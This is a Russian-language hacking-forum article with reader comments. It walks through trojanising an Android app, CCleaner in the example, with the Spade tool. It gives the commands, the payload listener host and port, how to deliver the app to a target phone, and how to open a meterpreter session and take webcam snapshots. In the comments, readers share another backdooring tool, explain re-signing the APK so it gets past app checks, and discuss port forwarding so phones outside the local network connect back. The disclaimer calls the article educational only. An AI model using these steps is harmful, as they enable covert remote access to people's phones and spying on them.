Статья Взлом Android-устройства

Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.

Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта www.apk4fun.com, попробуем, для начала, на ней.

Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
Код:
git clone https://github.com/suraj-root/spade.git
upload_2016-10-17_20-20-41.png

После успешного выполнения команды, вводим следующее:

> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)

После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.

> lhost > 192.168.0.103

> lport > 4444

upload_2016-10-17_20-21-32.png

upload_2016-10-17_20-21-40.png

Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.

upload_2016-10-17_20-22-6.png

Видим привилегии, которые нам доступны:

upload_2016-10-17_20-22-32.png

Готовый файл сохраняется в директории /root/spade

upload_2016-10-17_20-22-51.png

На запрос этой настройки отвечаем утвердительно:

upload_2016-10-17_20-23-18.png

Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:

upload_2016-10-17_20-23-36.png

Попробуем осмотреться в системе:

upload_2016-10-17_20-23-55.png

Все работает, теперь можно испытать работу, к примеру, камеры:
Код:
webcam_snap
upload_2016-10-17_20-24-23.png

И эта команда срабатывает успешно:

upload_2016-10-17_20-24-45.png

На этом все, спасибо за внимание.

Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
Ссылка на оригинал - http://www.hackingarticles.in/hack-android-phone-using-spade-apk-backdoor/

Последнее редактирование:
за статью спасибо , познавательно. Глаза от стольких мониторов не разбегаются?):eek:

Наши с тобой темы часто перекликаются :) Чтоб не плодить одно и то же, я добавлю к твоему рассказу ещё одну софтину для этих целей. Написана на RUBY, скачать можно прям отсюда.
Ну и небольшой видео обзор к ней.
Работаем в команде )))

Вложения

Последнее редактирование:
  • Нравится
Реакции: Vander
Наши с тобой темы часто перекликаются :) Чтоб не плодить одно и то же, я добавлю к твоему рассказу ещё одну софтину для этих целей. Написана на RUBY, скачать можно прям отсюда.
Ну и небольшой видео обзор к ней.

:) Ага, надо протестить на досуге

• Нравится
Реакции: z3RoTooL
:) Ага, надо протестить на досуге
слушай, но вот с ватсаппом такое не канает.. ну то есть он ставится, работает, но не даёт зарегать телефон, потому что подпись цифровая не родная...

слушай, но вот с ватсаппом такое не канает.. ну то есть он ставится, работает, но не даёт зарегать телефон, потому что подпись цифровая не родная...
Ты про Ruby софтинку?

ну эта софтина на руби сама подписывает, а если руками - вот ссылка

• Нравится
Реакции: ghost
По работе с ruby и подписями вот более подробный видос

• Нравится
Реакции: ghost и Vander
Спасибо за инфо

Господа, проблема возникла
на стадии пэйлода выдает такое и все тут
[*] Injecting payload...
mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit»: Нет такого файла или каталога
mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit/stage»: Нет такого файла или каталога
cp: указанная цель 'CCleaner_v1/smali/com/metasploit/stage/' не является каталогом
[-] [Errno 2] No such file or directory: 'CCleaner_v1/AndroidManifest.xml'
Пробовал разные апк, в пустую

Господа, проблема возникла
на стадии пэйлода выдает такое и все тут
[*] Injecting payload...
mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit»: Нет такого файла или каталога
mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit/stage»: Нет такого файла или каталога
cp: указанная цель 'CCleaner_v1/smali/com/metasploit/stage/' не является каталогом
[-] [Errno 2] No such file or directory: 'CCleaner_v1/AndroidManifest.xml'
Пробовал разные апк, в пустую
Привет, скриншот бы увидеть...

Привет, скриншот бы увидеть...
Проблему решил ту, возникла следующая - не создается файл -final, то есть в консоли пишется, мол создан ....-final.apk
но в папке спейда пусто

я так понимаю что если указать внешний IP и на роутере настроить правило переадресации порта на машину с кали (ну как это было рассказано в статье по Veali и Office) тогда смартфрну не нужуно будет находиться с мной в одной сети(подключенными к одному роутеру)? Сессия будет открыта как только как только запустишь приложение на смартфоне.

Опишите пожалуйста решение.
файл был дюже длинного названия, судя по всему, т.е. ccleaner_v1234... и тд , я попросту переименовал файл в ccleaner.apk и все

ПРоблема с отсутсвием ссleaner-final.apk АКТУальна!

Последнее редактирование модератором:
  • Нравится
Реакции: Сергей Попов
я так понимаю что если указать внешний IP и на роутере настроить правило переадресации порта на машину с кали (ну как это было рассказано в статье по Veali и Office) тогда смартфрну не нужуно будет находиться с мной в одной сети(подключенными к одному роутеру)? Сессия будет открыта как только как только запустишь приложение на смартфоне.
По идее, должно работать. Но не проверял. Если проверите, отпишитесь потом, пожалуйста

Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab